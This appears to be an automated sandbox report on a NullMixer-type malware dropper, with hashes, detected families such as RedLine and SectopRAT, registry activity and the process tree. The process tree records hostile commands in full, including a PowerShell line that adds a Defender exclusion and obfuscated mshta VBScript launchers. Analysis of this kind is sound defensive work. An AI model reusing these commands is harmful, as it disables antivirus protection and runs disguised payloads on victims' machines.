memory/1704-142-0x0000000000B40000-0x0000000000BB2000-memory.dmp
memory/1748-156-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
C:\Users\Admin\AppData\Local\Temp\is-5T6MP.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/1444-155-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1928-168-0x0000000000370000-0x0000000000376000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-5T6MP.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/1864-154-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1916-174-0x00000000003E0000-0x0000000000404000-memory.dmp
memory/1916-177-0x0000000003180000-0x00000000031A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe
| MD5 | 85ef31a707d583032b8526d16e8883a8 |
| SHA1 | 16beed53fc46bf75cf4081d73dc843f4d8298569 |
| SHA256 | bce2f04e884c2dd6e799861898546be00a745fa1e743ce51044d2232065d2409 |
| SHA512 | 8e2ca4555b5741400559244bd37e0be09b18e246026e3d0507b02956c27fdc9dabca55672cbd8a52a5832fe66c6da3fe1e649a1cfad101f9c655aa20aa1da31b |
memory/2696-198-0x00000000027F0000-0x000000000293C000-memory.dmp
memory/1244-201-0x0000000002750000-0x0000000002979000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20e095683c2b3a0c.exe
| MD5 | 44cfc728f9fbacd834c9b10ce768d41a |
| SHA1 | 6589a1435a2ba5ec11a312de5f339597831227d0 |
| SHA256 | 874c4eab9d0422ee52a1e02e4e95b07805a143dda5a54a19c6a122580aabdb68 |
| SHA512 | dd899e05bcbfaec1c3f46011367e000f3edfca1c2f542f9ed55bcbd136142940733f8aa8cd67bd5f647329195ffb843a255713dae362bc44a817734163409113 |
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe
| MD5 | d08cc10c7c00e13dfb01513f7f817f87 |
| SHA1 | f3adddd06b5d5b3f7d61e2b72860de09b410f571 |
| SHA256 | 0fb8440355ee2a2fe55de0661199620353a01ed4fd1b0d0a2082f4c226e98e0d |
| SHA512 | 0b9b8c7da24cdb882bc9b7a37689bc0e81d39f1277017b44512e9a17d9e4e44b314d5b3e06f332d64f3f6953f84d309d4027842ef0000ff012e7af5c9012caa0 |
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209c4b463b.exe
| MD5 | a729d63514511766fcdd2de19cdbd017 |
| SHA1 | 737827e5c0ab0adc287d3b3bb16d26a9a42f0939 |
| SHA256 | 6dda16414ec5a7f6908f6088ea5edb7c67b024c3f695fbf7048ab823bcfee728 |
| SHA512 | ad6bc65c950a94383f3f1d987508d22167343db632412b74d4734482916a7c18981dc8d84c57109f0882f6c5c6f280db876bafd24837f06996614d1bb9ce6ee2 |
memory/2280-211-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2280-210-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2280-209-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2280-208-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2280-206-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2280-202-0x0000000000400000-0x000000000051C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe
| MD5 | 7d44a083f0e81baf1ecb264b93bdc9a5 |
| SHA1 | 4dd23b40065e2ccfbdd4c79386d7e2d37a53efce |
| SHA256 | 073b1354e582f8fd758bd128d764fd305d50d76fc45147eb1240e8a402ed1da5 |
| SHA512 | 245827096522beb8b54a60ad3549cd7509ab35fe650cb2f7d6b48f4cf76430c25c3162ff284d78b19d2351457bbfbd0d2d71751abeb703fef3e2736ab6825c82 |
memory/1696-222-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1696-224-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1696-221-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1696-220-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1696-218-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1696-216-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1696-214-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1696-212-0x0000000000400000-0x0000000000422000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe
| MD5 | 06ee576f9fdc477c6a91f27e56339792 |
| SHA1 | 4302b67c8546d128f3e0ab830df53652f36f4bb0 |
| SHA256 | 035373a454afd283da27ebf569ab355be7db470a1a30c3695e18c984b785e1f8 |
| SHA512 | e5b337158905651e2740378615fcd9a8ba2b5e46f02c75be20c22e89b4cb40e8f1dfec1c5c1135f4d59114da9200a772f591622eddb865880b296321d80fb616 |
memory/2696-225-0x0000000002D80000-0x0000000002E25000-memory.dmp
memory/2696-232-0x0000000002E30000-0x0000000002EC2000-memory.dmp
memory/2696-229-0x0000000002E30000-0x0000000002EC2000-memory.dmp
memory/1916-234-0x0000000000400000-0x00000000016E0000-memory.dmp
memory/1984-233-0x0000000000400000-0x00000000016D5000-memory.dmp
memory/2228-249-0x0000000000400000-0x00000000016BC000-memory.dmp
memory/1560-251-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1244-252-0x0000000002D60000-0x0000000002E08000-memory.dmp
memory/1748-250-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1244-253-0x0000000002E10000-0x0000000002EA5000-memory.dmp
memory/1244-256-0x0000000002E10000-0x0000000002EA5000-memory.dmp
memory/1244-258-0x0000000002750000-0x0000000002979000-memory.dmp
memory/2696-257-0x00000000027F0000-0x000000000293C000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-24 21:35
Reported
2024-11-24 21:37
Platform
win10v2004-20241007-en
Max time kernel
11s
Max time network
122s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3456 set thread context of 4492 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ee0a6fe195bd09.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2002ce5f91c761.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209d5bfbb2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20c0c46650eeb2a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20e095683c2b3a0c.exe
Fri20e095683c2b3a0c.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe
Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe
Fri20109b9e174d0fc.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe
Fri209f6924af86d795.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ee0a6fe195bd09.exe
Fri20ee0a6fe195bd09.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209d5bfbb2.exe
Fri209d5bfbb2.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20c0c46650eeb2a.exe
Fri20c0c46650eeb2a.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe
Fri20d5530575e8aa3ed.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4160 -ip 4160
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe
Fri2060ea1c5d8fae8aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe
Fri20ba391d4469.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2002ce5f91c761.exe
Fri2002ce5f91c761.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe
Fri2050293ea5.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri200ae385720d3.exe
Fri200ae385720d3.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe
Fri208f5f140853548.exe
C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$5024C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 612
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe
"C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$301D6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4168 -ip 4168
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF ""=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4980 -ip 4980
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 620
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4168 -ip 4168
C:\Windows\SysWOW64\mshta.exe
